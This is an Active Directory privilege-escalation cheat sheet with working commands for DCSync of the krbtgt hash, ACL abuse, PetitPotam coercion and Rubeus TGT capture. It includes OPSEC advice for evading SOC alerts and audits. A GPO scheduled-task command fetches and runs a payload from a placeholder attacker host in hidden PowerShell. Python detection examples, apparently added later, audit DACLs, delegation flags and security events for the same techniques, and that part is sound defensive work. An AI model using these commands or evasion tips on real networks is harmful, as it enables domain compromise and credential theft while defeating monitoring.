Privilege Escalation
PrivEsc OPSEC
DCSync, ACL Abuse, Delegation, Token Impersonation
DCSync (Directory Replication Service)
Replicate password hashes directly from the DC. Requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights.
OPSEC warning: DCSync from an ordinary workstation immediately triggers a SOC alert (Event ID 4662). Run it from an Exchange server or an existing DC.
PowerShell / Bash
# [In-Memory] DCSync with Mimikatz without dropping it to disk
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /user:krbtgt"'
# [Impacket] Remote DCSync with an AES key (avoids the NTLM Logon Type 3 alert)
secretsdump.py domain.local/Administrator@DC_IP -aesKey -just-dc-user krbtgt
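The detection side of the warning above, written as an added example for this page (it is not part of the original cheat sheet and uses no tool from it): Event 4662 is logged on the DC whenever an account exercises the replication control-access rights, regardless of whether the request authenticated with NTLM or with an AES key, so a rule on the replication GUIDs in 4662 catches both variants shown. 4662 carries no source address, so the example joins it to the 4624 logon of the same session to recover the client IP the matrix refers to. The DC allowlist, the user names and the events are constructed sample data.

```python
"""Flag DCSync-style replication requests that do not come from a DC.

Sample events below are constructed for this example (not from the page).
Field names follow the EventData names of Security events 4662 and 4624.
"""

# Control-access-right GUIDs that appear in the Properties field of 4662
# when an account pulls directory changes (what DCSync does). Well-known values.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: the defender keeps an allowlist of DC computer accounts and DC
# addresses. These are constructed placeholders.
DC_ACCOUNTS = {"DC01$", "DC02$"}
DC_IPS = {"10.0.0.10", "10.0.0.11"}

# 4662 carries no source address, so it is joined to the 4624 network logon
# of the same session (4624.TargetLogonId == 4662.SubjectLogonId).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "DC02$", "TargetLogonId": "0x3e7a1",
     "IpAddress": "10.0.0.11", "LogonType": 3},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x3e7a1",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "TargetUserName": "jsmith", "TargetLogonId": "0x5c2e9",
     "IpAddress": "10.0.5.23", "LogonType": 3},
    {"EventID": 4662, "SubjectUserName": "jsmith", "SubjectLogonId": "0x5c2e9",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # An ordinary attribute read by the same user: must not alert.
    {"EventID": 4662, "SubjectUserName": "jsmith", "SubjectLogonId": "0x5c2e9",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "%%7683 {bf967a86-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights(properties):
    """Names of the replication control-access rights present in a 4662 Properties string."""
    text = properties.lower()
    return [name for guid, name in REPLICATION_GUIDS.items() if guid in text]


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS, dc_ips=DC_IPS):
    """Return one alert per replication request not attributable to a DC.

    Severity follows the matrix on this page: replication whose logon session
    came from a non-DC address is 'critical'; a non-DC account with no
    matching 4624 (source unknown) is 'high'.
    """
    session_ip = {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = replication_rights(e["Properties"])
        if not rights:
            continue
        user = e["SubjectUserName"]
        ip = session_ip.get(e["SubjectLogonId"])
        if user in dc_accounts and (ip is None or ip in dc_ips):
            continue  # DC-to-DC replication is expected
        severity = "critical" if ip is not None and ip not in dc_ips else "high"
        alerts.append({"user": user, "ip": ip, "rights": rights, "severity": severity})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"[{a['severity'].upper()}] {a['user']} from {a['ip']}: {', '.join(a['rights'])}")
```

The allowlist is deliberately limited to DC computer accounts: the "run it from Exchange" advice only blends in if the rule excludes every principal that happens to hold the replication rights, so the audit should instead treat any non-DC holder of those rights (Exchange groups included) as a finding to remove.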
ACL & GPO Abuse
Escalate privileges by exploiting misconfigured DACLs (Discretionary ACLs).
Do not grant GenericAll: GenericWrite or WriteDACL is stealthier and less conspicuous during an AD audit.
PowerShell
# [GenericAll] Stealthy password reset
Set-DomainUserPassword -Identity targetuser -AccountPassword "HackerPass123!"
# [GenericWrite] Targeted Kerberoasting: add a fake SPN
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='hacker/target'}
# [GPO Abuse] Deploy a malicious scheduled task if you hold GenericAll/WriteProperty on the GPO
New-GPOImmediateTask -TaskName "Update" -Command "powershell.exe" `
-CommandArguments "-nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content" `
-TargetGpoName "AppLocker Policy"
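Because the section above recommends the less conspicuous rights, a DACL audit that only looks for GenericAll misses exactly the ACEs an attacker would add. The following is an added example (not code from the page or from PowerView) that classifies ACEs the way Get-DomainObjectAcl reports them: the ActiveDirectoryRights mask plus the object-type GUID that scopes WriteProperty and ExtendedRight. The rights values are the documented System.DirectoryServices.ActiveDirectoryRights constants; the GUIDs are the well-known schema and control-access-right GUIDs; the trustees, DNs and ACE list are constructed sample data.

```python
"""Audit AD DACL entries for rights an attacker could abuse for escalation.

Sample ACEs are constructed for this example (not from the page). Field names
mirror PowerView's Get-DomainObjectAcl output.
"""
from enum import IntFlag


class ADRights(IntFlag):
    """Subset of System.DirectoryServices.ActiveDirectoryRights."""
    CreateChild = 0x1
    Self = 0x8
    ReadProperty = 0x10
    WriteProperty = 0x20
    ExtendedRight = 0x100
    Delete = 0x10000
    ReadControl = 0x20000
    WriteDacl = 0x40000
    WriteOwner = 0x80000
    GenericWrite = 0x20028   # ReadControl | WriteProperty | Self
    GenericAll = 0xF01FF


# Object-type GUIDs that scope a WriteProperty / ExtendedRight ACE. Well-known values.
GUID_ANY = "00000000-0000-0000-0000-000000000000"
GUID_FORCE_CHANGE_PW = "00299570-246d-11d0-a768-00aa006e0529"          # User-Force-Change-Password
GUID_SPN_ATTRIBUTE = "f3a64788-5306-11d1-a9c5-0000f80367c1"            # servicePrincipalName
GUID_MEMBER_ATTRIBUTE = "bf9679c0-0de6-11d0-a285-00aa003049e2"         # member
GUID_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"     # DS-Replication-Get-Changes-All

# Assumption: trustees that are expected to hold powerful rights. Constructed.
PRIVILEGED_TRUSTEES = {"CORP\\Domain Admins", "CORP\\Enterprise Admins", "NT AUTHORITY\\SYSTEM"}

SAMPLE_ACES = [
    {"ObjectDN": "CN=svc_backup,OU=Service,DC=corp,DC=local", "IdentityReference": "CORP\\helpdesk",
     "ActiveDirectoryRights": 0x20028, "ObjectType": GUID_ANY},                 # GenericWrite
    {"ObjectDN": "CN=Domain Admins,CN=Users,DC=corp,DC=local", "IdentityReference": "CORP\\Domain Admins",
     "ActiveDirectoryRights": 0xF01FF, "ObjectType": GUID_ANY},                 # expected
    {"ObjectDN": "CN=jdoe,OU=Staff,DC=corp,DC=local", "IdentityReference": "CORP\\intern",
     "ActiveDirectoryRights": 0x100, "ObjectType": GUID_FORCE_CHANGE_PW},       # password reset
    {"ObjectDN": "DC=corp,DC=local", "IdentityReference": "CORP\\svc_sync",
     "ActiveDirectoryRights": 0x100, "ObjectType": GUID_REPL_GET_CHANGES_ALL},  # DCSync right
    {"ObjectDN": "CN=jdoe,OU=Staff,DC=corp,DC=local", "IdentityReference": "CORP\\auditors",
     "ActiveDirectoryRights": 0x10, "ObjectType": GUID_ANY},                    # read only
]


def classify_ace(ace):
    """Return (finding, severity) pairs for one ACE; empty list if benign."""
    rights = ADRights(ace["ActiveDirectoryRights"])
    obj_type = ace.get("ObjectType", GUID_ANY).lower()
    findings = []
    if (rights & ADRights.GenericAll) == ADRights.GenericAll:
        return [("GenericAll: full control", "critical")]
    if rights & ADRights.WriteDacl:
        findings.append(("WriteDacl: can grant itself any right", "critical"))
    if rights & ADRights.WriteOwner:
        findings.append(("WriteOwner: can take ownership, then WriteDacl", "critical"))
    if rights & ADRights.WriteProperty:
        if obj_type == GUID_ANY:
            findings.append(("GenericWrite/WriteProperty on all attributes (SPN, scripts)", "high"))
        elif obj_type == GUID_SPN_ATTRIBUTE:
            findings.append(("WriteProperty servicePrincipalName: targeted Kerberoast", "high"))
        elif obj_type == GUID_MEMBER_ATTRIBUTE:
            findings.append(("WriteProperty member: can add itself to the group", "high"))
    if rights & ADRights.ExtendedRight:
        if obj_type in (GUID_ANY, GUID_FORCE_CHANGE_PW):
            findings.append(("ExtendedRight User-Force-Change-Password: password reset", "high"))
        if obj_type in (GUID_ANY, GUID_REPL_GET_CHANGES_ALL):
            findings.append(("ExtendedRight DS-Replication-Get-Changes-All: DCSync", "critical"))
    return findings


def audit_dacl(aces, privileged=PRIVILEGED_TRUSTEES):
    """Findings for ACEs held by non-privileged trustees, most severe first."""
    order = {"critical": 0, "high": 1}
    results = []
    for ace in aces:
        if ace["IdentityReference"] in privileged:
            continue
        for finding, severity in classify_ace(ace):
            results.append({"object": ace["ObjectDN"], "trustee": ace["IdentityReference"],
                            "finding": finding, "severity": severity})
    return sorted(results, key=lambda r: order[r["severity"]])


if __name__ == "__main__":
    for r in audit_dacl(SAMPLE_ACES):
        print(f"[{r['severity'].upper()}] {r['trustee']} on {r['object']}: {r['finding']}")
```

The GenericWrite entry is ranked high rather than critical on purpose: it cannot change the DACL, but it is enough for the SPN and logon-script techniques the page lists, which is why it must not be filtered out of the audit.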
Unconstrained Delegation & Coerced Auth
Coerce a high-privilege account (such as a DC) into authenticating to a machine you control and capture its TGT.
Use PetitPotam (MS-EFSR) instead of SpoolSample.exe (Print Spooler); it is less conspicuous in Event 5145.
PowerShell
# Find hosts with Unconstrained Delegation
Get-DomainComputer -Unconstrained | Select-Object name
# Wait in memory for incoming TGTs
.\Rubeus.exe monitor /interval:5 /nowrap
# Coerce the DC into authenticating: PetitPotam (MS-EFSR)
Invoke-PetitPotam -CaptureServer -Target
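The technique above only works against hosts that carry the TRUSTED_FOR_DELEGATION bit, so the matching defensive control is an inventory of that bit (and of the related delegation flags) in userAccountControl, which is what Get-DomainComputer -Unconstrained reads under the hood. The example below is added for this page and is not the page's or PowerView's code; the flag values are the documented userAccountControl bits, while the account list, names and adminCount values are constructed sample data.

```python
"""Audit userAccountControl for delegation exposure.

Sample accounts are constructed for this example (not from the page). The
flag values are the documented userAccountControl bits.
"""
from enum import IntFlag


class UAC(IntFlag):
    ACCOUNTDISABLE = 0x2
    NORMAL_ACCOUNT = 0x200
    WORKSTATION_TRUST_ACCOUNT = 0x1000
    SERVER_TRUST_ACCOUNT = 0x2000                 # domain controller
    TRUSTED_FOR_DELEGATION = 0x80000              # unconstrained delegation
    NOT_DELEGATED = 0x100000                      # "account is sensitive and cannot be delegated"
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # constrained delegation with protocol transition


SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "adminCount": 0},        # DC: expected
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000, "adminCount": 0},       # unconstrained, not a DC
    {"sAMAccountName": "FILE02$", "userAccountControl": 0x1000, "adminCount": 0},       # plain member server
    {"sAMAccountName": "svc_proxy", "userAccountControl": 0x1000200, "adminCount": 0},  # protocol transition
    {"sAMAccountName": "da_admin", "userAccountControl": 0x200, "adminCount": 1},       # privileged, delegatable
    {"sAMAccountName": "da_protected", "userAccountControl": 0x100200, "adminCount": 1},  # privileged, protected
]


def decode_uac(value):
    """Names of the known UAC flags set in value (unknown bits are ignored)."""
    return [f.name for f in UAC if value & f.value]


def audit_delegation(accounts):
    """Return (account, finding) pairs.

    Findings: unconstrained delegation on a non-DC host, constrained delegation
    with protocol transition, and privileged accounts (adminCount=1) that are
    not marked NOT_DELEGATED and can therefore be impersonated via delegation.
    """
    findings = []
    for a in accounts:
        uac = UAC(a["userAccountControl"])
        name = a["sAMAccountName"]
        is_dc = bool(uac & UAC.SERVER_TRUST_ACCOUNT)
        if (uac & UAC.TRUSTED_FOR_DELEGATION) and not is_dc:
            findings.append((name, "unconstrained delegation on a non-DC host"))
        if uac & UAC.TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((name, "constrained delegation with protocol transition (S4U2Self)"))
        if a.get("adminCount") == 1 and not (uac & UAC.NOT_DELEGATED):
            findings.append((name, "privileged account not marked 'sensitive, cannot be delegated'"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"{name}: {finding}")
```

DCs are excluded because they are unconstrained by design; the remediation for the other rows is to clear the flag on the host (or move it to resource-based constrained delegation), to place privileged accounts in Protected Users or set NOT_DELEGATED, and to keep the coerced-authentication surface (Print Spooler, EFSRPC) closed on DCs so the captured-TGT step has nothing to capture.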
OPSEC Notes & Telemetry Matrix
| Technique | Risk | EDR Telemetry | OPSEC Workaround |
|---|---|---|---|
| DCSync (from a workstation) | Critical | Event 4662 (Directory Service Access) from a non-DC IP. | Run from Exchange or an existing DC. |
| Token Impersonation | Medium | Process injection anomalies. | Use the native Win32 API (LogonUser). |
| S4U Delegation (RC4) | High | Ticket Encryption Type 0x17 (RC4). | Always use AES (0x12). |
| Print Spooler (MS-RPRN) | High | Event 5145. Heavily monitored. | Use MS-EFSR (PetitPotam). |
| GPO Modification | Medium | Event 5136 (Directory Service Changes). | Blends in with sysadmin activity. |
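The three telemetry rows that the matrix says are easiest to blend into (RC4 tickets, the coercion named pipes behind Event 5145, and GPO edits in Event 5136) become concrete rules in the added example below; it is not part of the original page and uses no tool from it. Pipe names, event fields and attribute names are the real ones from the Windows Security log; the GPO GUID, IPs, user names and the DC/GPO-admin allowlists are constructed sample data. Note that the MS-EFSR substitution the table recommends still opens an IPC$ pipe, so the same 5145 rule covers both interfaces once the pipe list includes efsrpc and lsarpc.

```python
"""Turn the OPSEC telemetry matrix into detection rules over Security events.

Sample events are constructed for this example (not from the page). Field
names follow the EventData names of events 4769, 5145 and 5136.
"""

# Named pipes behind the two coercion interfaces from the matrix: MS-RPRN is
# served on spoolss, MS-EFSR is reachable over its own pipe and over lsarpc,
# samr and netlogon.
COERCION_PIPES = {
    "spoolss": "MS-RPRN",
    "efsrpc": "MS-EFSR",
    "lsarpc": "MS-EFSR via lsarpc",
    "samr": "MS-EFSR via samr",
    "netlogon": "MS-EFSR via netlogon",
}
# Assumption: allowlists maintained by the defender. Constructed placeholders.
DC_IPS = {"10.0.0.10"}
GPO_ADMINS = {"CORP\\gpoadmin01"}

SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "MSSQLSvc/db01",
     "TicketEncryptionType": "0x12"},                               # AES256: normal
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "http/web01",
     "TicketEncryptionType": "0x17"},                               # RC4-HMAC: flag
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "efsrpc",
     "IpAddress": "10.0.5.23"},                                     # EFSRPC pipe from a workstation: flag
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc",
     "IpAddress": "10.0.5.23"},                                     # share enumeration: normal
    {"EventID": 5136, "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={GPO-GUID-PLACEHOLDER},CN=Policies,CN=System,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "gPCMachineExtensionNames",       # changes when a CSE such as Scheduled Tasks is added
     "SubjectDomainName": "CORP", "SubjectUserName": "jsmith"},     # not a GPO admin: flag
    {"EventID": 5136, "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={GPO-GUID-PLACEHOLDER},CN=Policies,CN=System,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "versionNumber",
     "SubjectDomainName": "CORP", "SubjectUserName": "gpoadmin01"},  # expected admin: normal
]


def rule_rc4_ticket(e):
    """4769 with TicketEncryptionType 0x17 (RC4-HMAC): legacy crypto or a
    deliberately downgraded S4U / Kerberoast request."""
    if e["EventID"] == 4769 and e["TicketEncryptionType"].lower() == "0x17":
        return f"RC4 service ticket for {e['ServiceName']} requested by {e['TargetUserName']}"
    return None


def rule_coercion_pipe(e):
    """5145 on IPC$ naming a coercion pipe, from a client that is not a DC."""
    if e["EventID"] == 5145 and e["ShareName"].endswith("IPC$"):
        pipe = e["RelativeTargetName"].lower()
        if pipe in COERCION_PIPES and e["IpAddress"] not in DC_IPS:
            return f"{COERCION_PIPES[pipe]} pipe '{pipe}' opened from {e['IpAddress']}"
    return None


def rule_gpo_change(e):
    """5136 on a groupPolicyContainer by someone outside the GPO admin allowlist."""
    if e["EventID"] == 5136 and e["ObjectClass"] == "groupPolicyContainer":
        who = f"{e['SubjectDomainName']}\\{e['SubjectUserName']}"
        if who not in GPO_ADMINS:
            return f"GPO {e['ObjectDN']} attribute {e['AttributeLDAPDisplayName']} changed by {who}"
    return None


RULES = [rule_rc4_ticket, rule_coercion_pipe, rule_gpo_change]


def run_rules(events, rules=RULES):
    """Return (EventID, message) for every rule that fires on every event."""
    return [(e["EventID"], msg) for e in events for r in rules if (msg := r(e))]


if __name__ == "__main__":
    for event_id, msg in run_rules(SAMPLE_EVENTS):
        print(f"{event_id}: {msg}")
```

Two caveats follow from the matrix itself. The GPO row says edits blend in with sysadmin activity, so the 5136 rule is only as good as its allowlist and should be correlated with change tickets; and 5136 sees only the AD side of a GPO, so the SYSVOL file changes a scheduled-task deployment also writes need file-system auditing (4663) on the Policies share.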